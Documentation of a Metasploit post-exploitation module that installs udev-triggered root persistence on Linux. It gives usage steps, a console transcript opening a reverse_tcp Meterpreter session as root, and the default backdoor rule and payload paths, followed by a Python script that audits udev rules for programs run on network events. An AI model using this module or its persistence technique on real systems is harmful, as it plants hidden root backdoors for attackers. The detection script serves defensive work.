This is a post module that installs persistence on a Linux system using [udev](https://en.wikipedia.org/wiki/Udev).
The persistence payload is triggered with root privileges every time a network interface other than `lo` comes up.

## Verification Steps

1. Start msfconsole
2. Obtain a session on the target machine
3. `use exploit/linux/local/udev_persistence`
4. `set session -1`
5. `exploit`

## Module usage

```
msf payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > use exploit/linux/local/udev_persistence
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(linux/local/udev_persistence) > set session -1
session => -1
msf exploit(linux/local/udev_persistence) > exploit

[*] /usr/bin/udev-check-updates written
[*] /lib/udev/rules.d/99-update.rules written
msf exploit(linux/local/udev_persistence) >
[*] Sending stage (3045380 bytes) to 172.18.49.39
[*] Meterpreter session 2 opened (172.18.52.45:4444 -> 172.18.49.39:41848) at 2024-09-13 03:59:47 -0400
msf exploit(linux/local/udev_persistence) > sessions -i -1
[*] Starting interaction with 2...

meterpreter > getuid
Server username: root
meterpreter >
```

## Options

### BACKDOOR_PATH

Specify the path of the file containing the udev rules. (Default: `/lib/udev/rules.d/99-update.rules`)

### PAYLOAD_PATH

Specify the name of the payload to execute upon persistence. (Default: `/usr/bin/udev-check-updates`)
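
To check a host for the artifact described above, the following added example (not part of the module or of Metasploit) lists every udev rule that runs a program on `net` device events. It assumes standard udev rule syntax; the sample rules are constructed for illustration, since this page does not show the rule text the module writes, and the `example-*` paths are hypothetical.

```python
import re
import sys
from fnmatch import fnmatchcase
from pathlib import Path

# Directories udev loads rules from (udev(7)); /lib is often a symlink to /usr/lib.
RULE_DIRS = ["/etc/udev/rules.d", "/run/udev/rules.d", "/usr/lib/udev/rules.d", "/lib/udev/rules.d"]
# One rule token: KEY, operator, quoted value, e.g. SUBSYSTEM=="net" or RUN+="/bin/x".
TOKEN = re.compile(r'([A-Z_]+(?:\{[^}]*\})?)\s*(==|!=|\+=|-=|:=|=)\s*"((?:[^"\\]|\\.)*)"')

# Constructed sample input; only the first path is taken from this page's defaults.
SAMPLE = r'''# constructed sample rules, not the module's actual rule file
ACTION=="add", SUBSYSTEM=="net", KERNEL!="lo", RUN+="/usr/bin/udev-check-updates"
SUBSYSTEM=="block", KERNEL=="sd*", RUN+="/usr/bin/example-disk-helper"
SUBSYSTEM=="net", ACTION=="add", NAME="lan0"
ACTION=="add", \
  RUN{program}+="/usr/bin/example-any-device"
'''

def applies_to_net(tokens):
    """True unless a SUBSYSTEM match key rules out the "net" subsystem."""
    for key, op, val in tokens:
        if key == "SUBSYSTEM" and op in ("==", "!="):
            hit = any(fnmatchcase("net", alt) for alt in val.split("|"))
            if hit != (op == "=="):
                return False
    return True

def audit_rules(text):
    """Return (rule, commands) for each rule that runs a program on net device events."""
    findings = []
    for line in text.replace("\\\n", " ").splitlines():  # join continued lines
        tokens = [] if line.lstrip().startswith("#") else TOKEN.findall(line)
        commands = [v for k, op, v in tokens if k.startswith("RUN") and op in ("=", "+=", ":=")]
        if commands and applies_to_net(tokens):
            findings.append((line.strip(), commands))
    return findings

def audit_host(dirs=RULE_DIRS):
    """Scan every *.rules file under the given directories; returns {path: findings}."""
    files = sorted({p.resolve() for d in dirs for p in Path(d).glob("*.rules")})
    report = {str(p): audit_rules(p.read_text(errors="replace")) for p in files}
    return {path: found for path, found in report.items() if found}

if __name__ == "__main__":
    for path, found in audit_host(sys.argv[1:] or RULE_DIRS).items():
        for rule, commands in found:
            print(f"{path}: runs {commands} on net events\n    {rule}")
```

The output is a review list: rules shipped by distribution packages will also appear, so compare each file against the package manager's ownership and checksum records and confirm that the referenced program is one you expect.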